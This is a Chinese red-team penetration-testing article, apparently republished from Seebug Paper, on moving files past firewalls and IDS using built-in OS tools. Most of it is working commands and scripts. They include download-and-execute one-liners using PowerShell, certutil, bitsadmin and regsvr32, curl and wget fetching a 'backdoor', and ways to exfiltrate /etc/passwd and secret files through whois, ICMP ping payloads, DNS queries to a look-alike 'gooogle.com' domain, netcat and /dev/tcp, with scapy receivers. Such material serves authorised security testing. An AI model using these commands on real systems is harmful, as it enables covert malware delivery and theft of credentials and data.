内容简介:在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的工具进行文件传输的方法。python2:以上命令会在当前目录启动 HTTP 服务,端口为 1337
作者:xax007@知道创宇404 ScanV安全服务团队
作者博客: https://xax007.github.io/
在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的 工具 进行文件传输的方法。
搭建 HTTP server
Python
python2:
python -m SimpleHTTPServer 1337
以上命令会在当前目录启动 HTTP 服务,端口为 1337
python3:
python -m http.server 1337
以上命令会在当前目录启动 HTTP 服务,端口为 1337
PHP 5.4+
当 PHP 版本大于 5.4 是,可使用 PHP 在当前目录启动 HTTP 服务,端口为 1337
php -S 0.0.0.0:1337
Ruby
下面的命令会在当前目录下启动 HTTP 服务,端口为 1337
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'
Ruby 1.9.2+
ruby -run -e httpd . -p 1337
Perl
<span class="nt">perl</span> <span class="nt">-MHTTP</span><span class="p">::</span><span class="nd">Server</span><span class="p">::</span><span class="nd">Brick</span> <span class="nt">-e</span> <span class="s1">'$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'</span> <span class="nt">perl</span> <span class="nt">-MIO</span><span class="p">::</span><span class="nd">All</span> <span class="nt">-e</span> <span class="s1">'io(":8080")->fork->accept->(sub { $_</span><span class="cp">[</span><span class="mi">0</span><span class="cp">]</span><span class="s1"> < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'</span>
Thanks to: http://stackoverflow.com/questions/8058793/single-line-python-webserver
busybox httpd
busybox httpd -f -p 8000
本条来自: lvm
Download files from HTTP server
以下列出了在 Windows 和 Linux 系统下使用系统自带工具从 HTTP Server 下载文件的几种方法
Windows
powershell
下载并执行:
<span class="nt">powershell</span> <span class="o">(</span><span class="nt">new-object</span> <span class="nt">System</span><span class="p">.</span><span class="nc">Net</span><span class="p">.</span><span class="nc">WebClient</span><span class="o">)</span><span class="p">.</span><span class="nc">DownloadFile</span><span class="o">(</span><span class="s1">'http://1.2.3.4/5.exe'</span><span class="o">,</span><span class="s1">'c:\download\a.exe'</span><span class="o">);</span><span class="nt">start-process</span> <span class="s1">'c:\download\a.exe'</span>
certutil
下载并执行:
certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe
bitsadmin
下载并执行:
bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe
bitsadmin 的下载速度比较慢
regsvr32
regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll
Linux
Curl
curl http://1.2.3.4/backdoor
Wget
wget http://1.2.3.4/backdoor
awk
在使用 awk 进行下载文件时,首先使用以上列出的任意一条命令启动一个 HTTP Server
awk 'BEGIN { RS = ORS = "\r\n" HTTPCon = "/inet/tcp/0/127.0.0.1/1337" print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n" |& HTTPCon while (HTTPCon |& getline > 0) print $0 close(HTTPCon) }'
效果:
Setup HTTP PUT server
以下列出了上传文件到 HTTP Server 的几种方法
使用 Nginx 搭建 HTTP PUT Server
mkdir -p /var/www/upload/ # 创建目录 chown www-data:www-data /var/www/upload/ # 修改目录所属用户和组 cd /etc/nginx/sites-available # 进入 nginx 虚拟主机目录 # 写入配置到 file_upload 文件 cat <<EOF > file_upload server { listen 8001 default_server; server_name kali; location / { root /var/www/upload; dav_methods PUT; } } EOF # 写入完毕 cd ../sites-enable # 进入 nginx 虚拟主机启动目录 ln -s /etc/nginx/sites-available/file_upload file_upload # 启用 file_upload 虚拟主机 systemctl start nginx # 启动 Nginx
使用 Python 搭建 HTTP PUT Server
以下代码保存到 HTTPutServer.py
文件里:
<span class="c1"># ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server</span> <span class="kn">import</span> <span class="nn">sys</span> <span class="kn">import</span> <span class="nn">signal</span> <span class="kn">from</span> <span class="nn">threading</span> <span class="kn">import</span> <span class="n">Thread</span> <span class="kn">from</span> <span class="nn">BaseHTTPServer</span> <span class="kn">import</span> <span class="n">HTTPServer</span><span class="p">,</span> <span class="n">BaseHTTPRequestHandler</span> <span class="k">class</span> <span class="nc">PUTHandler</span><span class="p">(</span><span class="n">BaseHTTPRequestHandler</span><span class="p">):</span> <span class="k">def</span> <span class="nf">do_PUT</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="n">length</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s1">'Content-Length'</span><span class="p">])</span> <span class="n">content</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">rfile</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="n">length</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">send_response</span><span class="p">(</span><span class="mi">200</span><span class="p">)</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">path</span><span class="p">[</span><span class="mi">1</span><span class="p">:],</span> <span class="s2">"w"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">content</span><span class="p">)</span> <span class="k">def</span> <span class="nf">run_on</span><span class="p">(</span><span class="n">port</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s2">"Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ..."</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">port</span><span class="p">))</span> <span class="n">server_address</span> <span class="o">=</span> <span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">port</span><span class="p">)</span> <span class="n">httpd</span> <span class="o">=</span> <span class="n">HTTPServer</span><span class="p">(</span><span class="n">server_address</span><span class="p">,</span> <span class="n">PUTHandler</span><span class="p">)</span> <span class="n">httpd</span><span class="o">.</span><span class="n">serve_forever</span><span class="p">()</span> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o"><</span> <span class="mi">3</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s2">"Usage:</span><span class="se">\n\t</span><span class="s2">python {0} ip 1337"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">ports</span> <span class="o">=</span> <span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">arg</span><span class="p">)</span> <span class="k">for</span> <span class="n">arg</span> <span class="ow">in</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">:]]</span> <span class="k">try</span><span class="p">:</span> <span class="k">for</span> <span class="n">port_number</span> <span class="ow">in</span> <span class="n">ports</span><span class="p">:</span> <span class="n">server</span> <span class="o">=</span> <span class="n">Thread</span><span class="p">(</span><span class="n">target</span><span class="o">=</span><span class="n">run_on</span><span class="p">,</span> <span class="n">args</span><span class="o">=</span><span class="p">[</span><span class="n">port_number</span><span class="p">])</span> <span class="n">server</span><span class="o">.</span><span class="n">daemon</span> <span class="o">=</span> <span class="bp">True</span> <span class="c1"># Do not make us wait for you to exit</span> <span class="n">server</span><span class="o">.</span><span class="n">start</span><span class="p">()</span> <span class="n">signal</span><span class="o">.</span><span class="n">pause</span><span class="p">()</span> <span class="c1"># Wait for interrupt signal, e.g. KeyboardInterrupt</span> <span class="k">except</span> <span class="ne">KeyboardInterrupt</span><span class="p">:</span> <span class="k">print</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">Python HTTP PUT Server Stoped."</span> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
运行方法:
$ python HTTPutServer.py <span class="m">10</span>.10.10.100 <span class="m">1337</span> Starting a HTTP PUT Server on <span class="m">10</span>.10.10.100 port <span class="m">1337</span> <span class="o">(</span>http://10.10.10.100:1337<span class="o">)</span> ...
上传文件到 HTTP PUT server
Linux
Curl
$ curl --upload-file secret.txt http://ip:port/
Wget
$ wget --method<span class="o">=</span>PUT --post-file<span class="o">=</span>secret.txt http://ip:port/
Windows
Powershell
$body = Get-Content secret.txt Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body
使用 Bash /dev/tcp 进行文件传输
首先需要监听端口
文件接收端:
nc -lvnp 1337 > secret.txt
文件发送端:
cat secret.txt > /dev/tcp/ip/port
使用 SMB 协议进行文件传输
搭建简易 SMB Server
搭建简易SMB Server 需要用到 Impacket 项目的 smbserver.py
文件
Impacket
已默认安装在 Kali Linux 系统中
syntax: impacker-smbserver ShareName SharePath
$ mkdir smb <span class="c1"># 创建 smb 目录</span> $ <span class="nb">cd</span> smb <span class="c1"># 进入 smb目录</span> $ impacket-smbserver share <span class="sb">`</span><span class="nb">pwd</span><span class="sb">`</span> <span class="c1"># 在当前目录启动 SMB server,共享名称为 share</span>
效果:
从 SMB server 下载文件
copy \\IP\ShareName\file.exe file.exe
上传文件到 SMB server
net use x: \\IP\ShareName copy file.txt x: net use x: /delete
使用 whois 命令进行文件传输
/etc/passwd
Host A
Host B
接收端 Host B:
nc -vlnp 1337 | sed "s/ //g" | base64 -d
发送端 Host A:
whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64`
效果:
使用 ping 命令进行文件传输
secret.txt
Sender
Reciver
发送端:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
接收端:
以下代码保存到 ping_receiver.py
<span class="kn">import</span> <span class="nn">sys</span> <span class="k">try</span><span class="p">:</span> <span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span> <span class="k">except</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s2">"Scapy not found, please install scapy: pip install scapy"</span><span class="p">)</span> <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="k">def</span> <span class="nf">process_packet</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span> <span class="k">if</span> <span class="n">pkt</span><span class="o">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">ICMP</span><span class="p">):</span> <span class="k">if</span> <span class="n">pkt</span><span class="p">[</span><span class="n">ICMP</span><span class="p">]</span><span class="o">.</span><span class="n">type</span> <span class="o">==</span> <span class="mi">8</span><span class="p">:</span> <span class="n">data</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">[</span><span class="n">ICMP</span><span class="p">]</span><span class="o">.</span><span class="n">load</span><span class="p">[</span><span class="o">-</span><span class="mi">4</span><span class="p">:]</span> <span class="k">print</span><span class="p">(</span><span class="n">f</span><span class="s1">'{data.decode("utf-8")}'</span><span class="p">,</span> <span class="n">flush</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s2">""</span><span class="p">,</span> <span class="n">sep</span><span class="o">=</span><span class="s2">""</span><span class="p">)</span> <span class="n">sniff</span><span class="p">(</span><span class="n">iface</span><span class="o">=</span><span class="s2">"eth0"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">process_packet</span><span class="p">)</span>
执行方法:
python3 ping_receiver.py
效果
使用 dig 命令进行文件传输
/etc/passwd
Sender
Reciver
发送端:
<span class="n">xxd</span> <span class="o">-</span><span class="n">p</span> <span class="o">-</span><span class="n">c</span> <span class="mi">31</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">passwd</span> <span class="o">|</span> <span class="k">while</span> <span class="n">read</span> <span class="n">line</span><span class="p">;</span> <span class="k">do</span> <span class="n">dig</span> <span class="mf">@172.16.1.100</span> <span class="o">+</span><span class="kt">short</span> <span class="o">+</span><span class="n">tries</span><span class="o">=</span><span class="mi">1</span> <span class="o">+</span><span class="n">time</span><span class="o">=</span><span class="mi">1</span> <span class="err">$</span><span class="n">line</span><span class="p">.</span><span class="n">gooogle</span><span class="p">.</span><span class="n">com</span><span class="p">;</span> <span class="n">done</span>
接收端:
以下代码使用了 python 的 scapy
模块,需要手动安装
代码保存到 dns_reciver.py
文件中
<span class="nn">try</span><span class="p">:</span> <span class="s s-Atom">from</span> <span class="s s-Atom">scapy</span><span class="p">.</span><span class="s s-Atom">all</span> <span class="s s-Atom">import</span> <span class="o">*</span> <span class="nn">except</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="s2">"Scapy not found, please install scapy: pip install scapy"</span><span class="p">)</span> <span class="s s-Atom">def</span> <span class="nf">process_packet</span><span class="p">(</span><span class="s s-Atom">pkt</span><span class="p">)</span><span class="s s-Atom">:</span> <span class="s s-Atom">if</span> <span class="s s-Atom">pkt</span><span class="p">.</span><span class="nf">haslayer</span><span class="p">(</span><span class="nv">DNS</span><span class="p">)</span><span class="s s-Atom">:</span> <span class="s s-Atom">domain</span> <span class="o">=</span> <span class="s s-Atom">pkt</span><span class="p">[</span><span class="nv">DNS</span><span class="p">][</span><span class="nv">DNSQR</span><span class="p">].</span><span class="s s-Atom">qname</span><span class="p">.</span><span class="nf">decode</span><span class="p">(</span><span class="s s-Atom">'utf-8'</span><span class="p">)</span> <span class="s s-Atom">root_domain</span> <span class="o">=</span> <span class="s s-Atom">domain</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="s s-Atom">'.'</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span> <span class="s s-Atom">if</span> <span class="s s-Atom">root_domain</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="s s-Atom">'gooogle'</span><span class="p">)</span><span class="s s-Atom">:</span> <span class="nf">print</span><span class="p">(</span><span class="s s-Atom">f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}'</span><span class="p">,</span> <span class="s s-Atom">flush</span><span class="o">=</span><span class="nv">True</span><span class="p">,</span> <span class="s s-Atom">end=''</span><span class="p">)</span> <span class="nf">sniff</span><span class="p">(</span><span class="s s-Atom">iface=</span><span class="s2">"eth0"</span><span class="p">,</span> <span class="s s-Atom">prn</span><span class="o">=</span><span class="s s-Atom">process_packet</span><span class="p">)</span>
运行方法:
python3 dns_reciver.py
效果:
使用 NetCat 进行文件传输
1.txt
A:10.10.10.100
B:10.10.10.200
接受端:
nc -l -p 1337 > 1.txt
发送端:
cat 1.txt | nc -l -p 1337
或者
nc 10.10.10.200 1337 < 1.txt
在极端环境下,如果接受端没有 nc 可以使用 Bash 的 /dev/tcp 接收文件:
cat < /dev/tcp/10.10.10.200/1337 > 1.txt
参考链接
- Ippsec’s HackTheBox - Mischief Video
- Micropoor
- Simple Local HTTP Server With Ruby
- Big list of http static server one liners
- 渗透技巧——从github下载文件的多种方法
本文由 Seebug Paper 发布,如需转载请注明来源。本文地址: https://paper.seebug.org/834/
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 红队与渗透测试tips
- 渗透测试实战第三版(红队版)
- 红队后渗透测试中的文件传输技巧
- 红队渗透测试之使用 OpenSSL 反弹加密 shell
- 红队战术:流程监控技术
- 红队PostgreSQL攻击教程
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。